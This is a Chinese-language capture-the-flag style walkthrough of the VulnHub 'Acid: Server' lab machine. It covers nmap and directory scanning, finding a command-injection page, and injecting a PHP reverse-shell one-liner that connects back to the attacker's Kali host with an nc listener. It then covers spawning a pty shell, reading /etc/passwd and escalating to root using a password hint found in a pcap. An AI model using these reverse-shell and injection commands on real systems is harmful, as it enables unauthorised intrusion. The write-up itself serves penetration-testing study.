写在前面:前人栽树后人乘凉,谢谢网上各位大佬的解题思路作为参考学习;
一、实验准备
1、实验地址: Acid: Server ~ VulnHub
2、下载之后,本地解压,用VMware运行该虚拟机;
3、设置ACID与攻击机网络环境,保证在同一局域网;
4、本实验攻击机使用的是Kali Linux,攻击机地址:10.10.10.131
二、情报收集
1、扫描局域网主机
┌──(root💀kali)-[~]
└─# nmap -sP 10.10.10.0/24 
2、端口扫描
──(root💀kali)-[~]
└─# nmap -A -p1-65535 10.10.10.146
这里扫描到了33447端口,并且有一个奇怪的标题:/Challenge
3、访问33447端口
- 查看网页源代码之后,可确认,之前nmap扫描到的奇怪标题:/Challenge,我们尝试访问,发现是一个登陆界面,查看源代码发现密码做了hash运算;
- 尝试万能密码,无果,不知道加密方式,暂不考虑用bp爆破;
- 通过登录尝试,可以知道网站后台使用的PHP语言,下面是登录尝试之后的URL变化:
http://10.10.10.146:33447/Challenge/index.php?error=1
4、目录扫描
┌──(root💀kali)-[~]
└─# dirsearch -u "http://10.10.10.146:33447" 
- 扫描到了index.html,可见,首页是静态页面,无利用的地方;
- 更换目录扫描工具
┌──(root💀kali)-[~]
└─# dirbuster -u "http://10.10.10.146:33447" 
- 对dirbuster扫描结果进行访问:
①include.php和hacked.php会重定向到http://10.10.10.146:33447/Challenge/protected_page.php
②logout.php会重定向到http://10.10.10.146:33447/Challenge/index.php
③cake.php可以得到一个奇怪的标题/Magic_Box
④其它目录,暂未发现有用情报;
5、深度目录扫描/Magic_Box
- 对扫描结果进行访问,发现http://10.10.10.146:33447/Challenge/Magic_Box/command.php存在命令执行漏洞;
- 通过view-source查看执行结果如下:
三、开始攻击
1、通过命令执行,找寻可利用文件;
- 通过对网站目录的遍历,发下如下:/*63425*/
兜兜转转又回到了命令执行,通过搜索引擎,知晓通过命令执行获取反弹shell的方法:
①在攻击机启用nc监听端口:
┌──(root💀kali)-[/tmp/acid_text]
└─# nc -lvnp 6666
listening on [any] 6666 ...
②在命令执行框内执行如下代码:
;php -r '$sock=fsockopen("10.10.10.131",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
用php执行后续命令 攻击机地址,端口尝试之后发现没有解析,进行URL编码
之后我反复尝试,在浏览器中直接输入此URL编码进行命令执行并不能解析,通过bp发送数据包成功;
③提升权限
python -c 'import pty;pty.spawn("/bin/bash")'- 我们尝试读取/etc/passwd
注意:root、acid、saman
查找三用户的文件:
find / -user acid 2>/dev/null- acid:/sbin/raw_vs_isi/hint.pcapng
嘿嘿嘿嘿嘿嘿
- 复制该文件到我们的攻击机进行查看
- 查看wireshark数据包时,会发现如下这一段话:
"saman and now a days he's known by the alias of 1337hax0r"
- 让我们尝试下
- 切换到acid用户可行,尝试切换root用户
Congradulations!!
